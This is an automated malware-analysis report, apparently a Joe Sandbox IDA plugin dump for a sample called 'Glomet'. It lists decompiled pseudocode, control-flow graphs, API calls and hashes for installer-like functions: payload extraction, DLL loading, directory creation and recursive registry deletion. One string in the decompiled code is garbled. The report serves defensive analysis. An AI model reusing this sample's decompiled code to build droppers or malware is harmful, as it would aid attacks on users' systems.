                                                                                                                                                                              • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405426
                                                                                                                                                                              • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405434
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                              • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll
                                                                                                                                                                              • API String ID: 2531174081-3088349991
                                                                                                                                                                              • Opcode ID: 21f3fbad3f320d21e4f6dada675e32395d1bb8621f14401d727b4391d208c3a9
                                                                                                                                                                              • Instruction ID: bfa893c7d30147700316bd172ea6c956eb0bdb6a7275625f57f4f23b87bde493
                                                                                                                                                                              • Opcode Fuzzy Hash: 21f3fbad3f320d21e4f6dada675e32395d1bb8621f14401d727b4391d208c3a9
                                                                                                                                                                              • Instruction Fuzzy Hash: D7218C71A00518BBDB11AFA5DD84ADFBFB9EF04354F14807AF904B6290C7798E908F98
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 00403143 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 166COMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 655 403143-403157 656 403160-403169 655->656 657 403159 655->657 658 403172-403177 656->658 659 40316b 656->659 657->656 660 403187-403194 call 403355 658->660 661 403179-403182 call 40336b 658->661 659->658 665 403343 660->665 666 40319a-40319e 660->666 661->660 667 403345-403346 665->667 668 4031a4-4031ed GetTickCount 666->668 669 4032ee-4032f0 666->669 672 40334e-403352 667->672 673 4031f3-4031fb 668->673 674 40334b 668->674 670 403330-403333 669->670 671 4032f2-4032f5 669->671 675 403335 670->675 676 403338-403341 call 403355 670->676 671->674 677 4032f7 671->677 678 403200-40320e call 403355 673->678 679 4031fd 673->679 674->672 675->676 676->665 688 403348 676->688 682 4032fa-403300 677->682 678->665 687 403214-40321d 678->687 679->678 685 403302 682->685 686 403304-403312 call 403355 682->686 685->686 686->665 692 403314-403319 call 405e91 686->692 691 403223-403243 call 406788 687->691 688->674 697 4032e6-4032e8 691->697 698 403249-40325c GetTickCount 691->698 696 40331e-403320 692->696 699 403322-40332c 696->699 700 4032ea-4032ec 696->700 697->667 701 4032a1-4032a3 698->701 702 40325e-403266 698->702 699->682 703 40332e 699->703 700->667 706 4032a5-4032a9 701->706 707 4032da-4032de 701->707 704 403268-40326c 702->704 705 40326e-403299 MulDiv wsprintfA call 405378 702->705 703->674 704->701 704->705 713 40329e 705->713 710 4032c0-4032cb 706->710 711 4032ab-4032b2 call 405e91 706->711 707->673 708 4032e4 707->708 708->674 712 4032ce-4032d2 710->712 715 4032b7-4032b9 711->715 712->691 716 4032d8 712->716 713->701 715->700 717 4032bb-4032be 715->717 716->674 717->712
                                                                                                                                                                              C-Code - Quality: 95%
                                                                                                                                                                              			E00403143(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				char _v88;
				void* _t65;
				void* _t69;
				long _t70;
				intOrPtr _t75;
				long _t76;
				intOrPtr _t77;
				void* _t78;
				int _t88;
				intOrPtr _t92;
				intOrPtr _t95;
				long _t96;
				signed int _t97;
				int _t98;
				int _t99;
				intOrPtr _t100;
				void* _t101;
				void* _t102;

				_t97 = _a16;
				_t92 = _a12;
				_v12 = _t97;
				if(_t92 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t92;
				if(_t92 == 0) {
					_v16 = 0x421448;
				}
				_t62 = _a4;
				if(_a4 >= 0) {
					E0040336B( *0x42f478 + _t62);
				}
				if(E00403355( &_a16, 4) == 0) {
					L41:
					_push(0xfffffffd);
					goto L42;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t92 != 0) {
							if(_a16 < _t97) {
								_t97 = _a16;
							}
							if(E00403355(_t92, _t97) != 0) {
								_v8 = _t97;
								L44:
								return _v8;
							} else {
								goto L41;
							}
						}
						if(_a16 <= _t92) {
							goto L44;
						}
						_t88 = _v12;
						while(1) {
							_t98 = _a16;
							if(_a16 >= _t88) {
								_t98 = _t88;
							}
							if(E00403355(0x41d448, _t98) == 0) {
								goto L41;
							}
							_t69 = E00405E91(_a8, 0x41d448, _t98); // executed
							if(_t69 == 0) {
								L28:
								_push(0xfffffffe);
								L42:
								_pop(_t65);
								return _t65;
							}
							_v8 = _v8 + _t98;
							_a16 = _a16 - _t98;
							if(_a16 > 0) {
								continue;
							}
							goto L44;
						}
						goto L41;
					}
					_t70 = GetTickCount();
					 *0x40bdac =  *0x40bdac & 0x00000000;
					 *0x40bda8 =  *0x40bda8 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t70;
					 *0x40b890 = 8;
					 *0x415438 = 0x40d430;
					 *0x415434 = 0x40d430;
					 *0x415430 = 0x415430;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L44;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t99 = 0x4000;
						if(_a16 < 0x4000) {
							_t99 = _a16;
						}
						if(E00403355(0x41d448, _t99) == 0) {
							goto L41;
						}
						_a16 = _a16 - _t99;
						 *0x40b880 = 0x41d448;
						 *0x40b884 = _t99;
						while(1) {
							_t95 = _v16;
							 *0x40b888 = _t95;
							 *0x40b88c = _v12;
							_t75 = E00406788("0\xef\xbf							_v24 = _t75;
							if(_t75 < 0) {
								break;
							}
							_t100 =  *0x40b888; // 0x422e48
							_t101 = _t100 - _t95;
							_t76 = GetTickCount();
							_t96 = _t76;
							if(( *0x42f4d4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v88, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t102 = _t102 + 0xc;
								E00405378(0,  &_v88); // executed
								_v20 = _t96;
							}
							if(_t101 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L44;
							} else {
								if(_a12 != 0) {
									_t77 =  *0x40b888; // 0x422e48
									_v8 = _v8 + _t101;
									_v12 = _v12 - _t101;
									_v16 = _t77;
									L23:
									if(_v24 != 1) {
										continue;
									}
									goto L44;
								}
								_t78 = E00405E91(_a8, _v16, _t101); // executed
								if(_t78 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t101;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L42;
					}
					goto L41;
				}
			}


























                                                                                                                                                                              0x0040314b
                                                                                                                                                                              0x0040314f
                                                                                                                                                                              0x00403152
                                                                                                                                                                              0x00403157
                                                                                                                                                                              0x00403159
                                                                                                                                                                              0x00403159
                                                                                                                                                                              0x00403160
                                                                                                                                                                              0x00403164
                                                                                                                                                                              0x00403169
                                                                                                                                                                              0x0040316b
                                                                                                                                                                              0x0040316b
                                                                                                                                                                              0x00403172
                                                                                                                                                                              0x00403177
                                                                                                                                                                              0x00403182
                                                                                                                                                                              0x00403182
                                                                                                                                                                              0x00403194
                                                                                                                                                                              0x00403343
                                                                                                                                                                              0x00403343
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040319a
                                                                                                                                                                              0x0040319e
                                                                                                                                                                              0x004032f0
                                                                                                                                                                              0x00403333
                                                                                                                                                                              0x00403335
                                                                                                                                                                              0x00403335
                                                                                                                                                                              0x00403341
                                                                                                                                                                              0x00403348
                                                                                                                                                                              0x0040334b
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403341
                                                                                                                                                                              0x004032f5
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004032f7
                                                                                                                                                                              0x004032fa
                                                                                                                                                                              0x004032fd
                                                                                                                                                                              0x00403300
                                                                                                                                                                              0x00403302
                                                                                                                                                                              0x00403302
                                                                                                                                                                              0x00403312
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403319
                                                                                                                                                                              0x00403320
                                                                                                                                                                              0x004032ea
                                                                                                                                                                              0x004032ea
                                                                                                                                                                              0x00403345
                                                                                                                                                                              0x00403345
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403345
                                                                                                                                                                              0x00403322
                                                                                                                                                                              0x00403325
                                                                                                                                                                              0x0040332c
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040332e
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004032fa
                                                                                                                                                                              0x004031aa
                                                                                                                                                                              0x004031ac
                                                                                                                                                                              0x004031b3
                                                                                                                                                                              0x004031ba
                                                                                                                                                                              0x004031ba
                                                                                                                                                                              0x004031c1
                                                                                                                                                                              0x004031c9
                                                                                                                                                                              0x004031d3
                                                                                                                                                                              0x004031d8
                                                                                                                                                                              0x004031e0
                                                                                                                                                                              0x004031ea
                                                                                                                                                                              0x004031ed
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004031f3
                                                                                                                                                                              0x004031f3
                                                                                                                                                                              0x004031f3
                                                                                                                                                                              0x004031fb
                                                                                                                                                                              0x004031fd
                                                                                                                                                                              0x004031fd
                                                                                                                                                                              0x0040320e
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403214
                                                                                                                                                                              0x00403217
                                                                                                                                                                              0x0040321d
                                                                                                                                                                              0x00403223
                                                                                                                                                                              0x00403223
                                                                                                                                                                              0x0040322e
                                                                                                                                                                              0x00403234
                                                                                                                                                                              0x00403239
                                                                                                                                                                              0x00403240
                                                                                                                                                                              0x00403243
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403249
                                                                                                                                                                              0x0040324f
                                                                                                                                                                              0x00403251
                                                                                                                                                                              0x0040325a
                                                                                                                                                                              0x0040325c
                                                                                                                                                                              0x0040328a
                                                                                                                                                                              0x00403290
                                                                                                                                                                              0x00403299
                                                                                                                                                                              0x0040329e
                                                                                                                                                                              0x0040329e
                                                                                                                                                                              0x004032a3
                                                                                                                                                                              0x004032de
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004032a5
                                                                                                                                                                              0x004032a9
                                                                                                                                                                              0x004032c0
                                                                                                                                                                              0x004032c5
                                                                                                                                                                              0x004032c8
                                                                                                                                                                              0x004032cb
                                                                                                                                                                              0x004032ce
                                                                                                                                                                              0x004032d2
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004032d8
                                                                                                                                                                              0x004032b2
                                                                                                                                                                              0x004032b9
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004032bb
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004032bb
                                                                                                                                                                              0x004032a3
                                                                                                                                                                              0x004032e6
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004032e6
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004031f3

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CountTick$wsprintf
                                                                                                                                                                              • String ID: ... %d%%$0A$H.B
                                                                                                                                                                              • API String ID: 551687249-3873104639
                                                                                                                                                                              • Opcode ID: ede1e8e15d747a91ca4de53f89313a3819b99860a5cad6c8dedb11164fc401f9
                                                                                                                                                                              • Instruction ID: cc32688fb846b20799601ecf4724bdf5f6a604bb501928ae6cb5e0d1b862edc2
                                                                                                                                                                              • Opcode Fuzzy Hash: ede1e8e15d747a91ca4de53f89313a3819b99860a5cad6c8dedb11164fc401f9
                                                                                                                                                                              • Instruction Fuzzy Hash: 10517C71800219ABDB10DFA5DA8469F7BB8EF44766F14817BEC41B72D0C7389A50CBA9
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 004065F5 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 718 4065f5-406615 GetSystemDirectoryA 719 406617 718->719 720 406619-40661b 718->720 719->720 721 40662b-40662d 720->721 722 40661d-406625 720->722 724 40662e-406660 wsprintfA LoadLibraryExA 721->724 722->721 723 406627-406629 722->723 723->724
                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E004065F5(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x40a014; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}








                                                                                                                                                                              0x0040660c
                                                                                                                                                                              0x00406615
                                                                                                                                                                              0x00406617
                                                                                                                                                                              0x00406617
                                                                                                                                                                              0x0040661b
                                                                                                                                                                              0x0040662d
                                                                                                                                                                              0x00406627
                                                                                                                                                                              0x00406627
                                                                                                                                                                              0x00406627
                                                                                                                                                                              0x00406631
                                                                                                                                                                              0x00406645
                                                                                                                                                                              0x00406659
                                                                                                                                                                              0x00406660

                                                                                                                                                                              APIs
                                                                                                                                                                              • GetSystemDirectoryA.KERNEL32 ref: 0040660C
                                                                                                                                                                              • wsprintfA.USER32 ref: 00406645
                                                                                                                                                                              • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406659
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                              • String ID: %s%s.dll$UXTHEME$\
                                                                                                                                                                              • API String ID: 2200240437-4240819195
                                                                                                                                                                              • Opcode ID: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                                                                                                                                              • Instruction ID: 9f789840e0b15416ae64874b5c60068ae2f650887ed5db1015d4ebb1f4ad26b2
                                                                                                                                                                              • Opcode Fuzzy Hash: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                                                                                                                                              • Instruction Fuzzy Hash: 12F0213051060A67DB14A764DD0DFFB3B5CEB08304F14047EA586F10C1DAB9D5358B5D
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 0040583E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 725 40583e-405889 CreateDirectoryA 726 40588b-40588d 725->726 727 40588f-40589c GetLastError 725->727 728 4058b6-4058b8 726->728 727->728 729 40589e-4058b2 SetFileSecurityA 727->729 729->726 730 4058b4 GetLastError 729->730 730->728
                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E0040583E(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x408384;
				_v36.Group = 0x408384;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x408374;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                                                                                                                                                              0x00405849
                                                                                                                                                                              0x0040584d
                                                                                                                                                                              0x00405850
                                                                                                                                                                              0x00405856
                                                                                                                                                                              0x0040585a
                                                                                                                                                                              0x0040585e
                                                                                                                                                                              0x00405866
                                                                                                                                                                              0x0040586d
                                                                                                                                                                              0x00405873
                                                                                                                                                                              0x0040587a
                                                                                                                                                                              0x00405881
                                                                                                                                                                              0x00405889
                                                                                                                                                                              0x0040588b
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040588b
                                                                                                                                                                              0x00405895
                                                                                                                                                                              0x0040589c
                                                                                                                                                                              0x004058b2
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004058b4
                                                                                                                                                                              0x004058b8

                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateDirectoryA.KERNELBASE(?,0000000B,C:\Users\user\AppData\Local\Temp\), ref: 00405881
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00405895
                                                                                                                                                                              • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004058AA
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 004058B4
                                                                                                                                                                              Strings
                                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405864
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                              • API String ID: 3449924974-3916508600
                                                                                                                                                                              • Opcode ID: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                                                                                                                                              • Instruction ID: 2f5b217c954ff7fbb4119b01485a045b77912d3f79ec2e58d5a645a6a403fb95
                                                                                                                                                                              • Opcode Fuzzy Hash: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                                                                                                                                              • Instruction Fuzzy Hash: A7010872C00219EAEF00DBA1C944BEFBBB8EF04355F00803AD945B6290E7789658CB99
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 00402D3B Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 731 402d3b-402d64 call 4060dd 733 402d69-402d6d 731->733 734 402d73-402d77 733->734 735 402e1e-402e22 733->735 736 402d79-402d9a RegEnumValueA 734->736 737 402d9c-402daf 734->737 736->737 738 402e03-402e11 RegCloseKey 736->738 739 402dd8-402ddf RegEnumKeyA 737->739 738->735 740 402db1-402db3 739->740 741 402de1-402df3 RegCloseKey call 406663 739->741 740->738 743 402db5-402dc9 call 402d3b 740->743 747 402e13-402e19 741->747 748 402df5-402e01 RegDeleteKeyA 741->748 743->741 749 402dcb-402dd7 743->749 747->735 748->735 749->739
                                                                                                                                                                              C-Code - Quality: 48%
                                                                                                                                                                              			E00402D3B(void* __eflags, void* _a4, char* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				char _v276;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004060DD(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8); // executed
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v276);
						_push(0);
						while(RegEnumKeyA(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402D3B(__eflags, _v8,  &_v276, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v276);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406663(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyA(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueA(_v8, 0,  &_v276,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}












                                                                                                                                                                              0x00402d46
                                                                                                                                                                              0x00402d4f
                                                                                                                                                                              0x00402d58
                                                                                                                                                                              0x00402d64
                                                                                                                                                                              0x00402d6d
                                                                                                                                                                              0x00402d77
                                                                                                                                                                              0x00402d9c
                                                                                                                                                                              0x00402da2
                                                                                                                                                                              0x00402da7
                                                                                                                                                                              0x00402da8
                                                                                                                                                                              0x00402dd8
                                                                                                                                                                              0x00402db1
                                                                                                                                                                              0x00402db3
                                                                                                                                                                              0x00402e03
                                                                                                                                                                              0x00402e06
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00402e0c
                                                                                                                                                                              0x00402dc2
                                                                                                                                                                              0x00402dc7
                                                                                                                                                                              0x00402dc9
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00402dd1
                                                                                                                                                                              0x00402dd6
                                                                                                                                                                              0x00402dd7
                                                                                                                                                                              0x00402dd7
                                                                                                                                                                              0x00402de4
                                                                                                                                                                              0x00402dec
                                                                                                                                                                              0x00402df3
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00402e1c
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00402dfb
                                                                                                                                                                              0x00402d87
                                                                                                                                                                              0x00402d9a
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00402d9a
                                                                                                                                                                              0x00402e22

                                                                                                                                                                              APIs
                                                                                                                                                                              • RegEnumValueA.ADVAPI32 ref: 00402D8F
                                                                                                                                                                              • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402DDB
                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DE4
                                                                                                                                                                              • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402DFB
                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402E06
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseEnum$DeleteValue
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1354259210-0
